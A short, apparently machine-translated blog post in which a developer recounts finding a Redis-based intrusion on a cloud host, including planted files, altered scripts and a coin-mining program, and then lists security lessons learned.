30th TATAUFO Technology Team built, it was a good day, did not think unexpectedly is the beginning of tragedy.
At night, my colleague told me that I had user feedback to send a friend's invitation message in the name of the user.
Did the last bug interface be executed? Log in to the cloud host, found that the root directory has an exception file, actually the file name is Jave, the user group is redis,tmd!
Check all the link ports and discover that there are SSH links from 188.8.131.52, hacker attacks! Check all the programs that have Redis user rights, check all crontab, check all the files that were updated on 30th, and discover that there are many unknown files.
At the same time, all files under the/mnt mounted disk have been altered, including an interface script that sends a friend request SMS to the Address Book user. In the last upgrade (3.1.5), there is a bug, the script without input parameters, will be sent to all contacts friends text messages, rely on, omg! Does that guy execute these scripts!
More Ghosts under/tmp, MONI.1! Incredibly is the infamous Wright Coin mining program!
Immediately forcibly kill, delete redis users, delete all unknown files, restore the user's relevant data, ... The system should be OK.
Security, security, cloud Server security more attention! Reflect on:
- If the cloud service tells you that there is a security risk, don't be lucky, think you are old, God bless you!
- Do not back up flawed code, always clean the code
- Attention to the cloud monitoring, response must be timely
- Deploy bastion machines as soon as possible, don't be afraid of trouble
Cloud Security! An old code to the hacker passive battle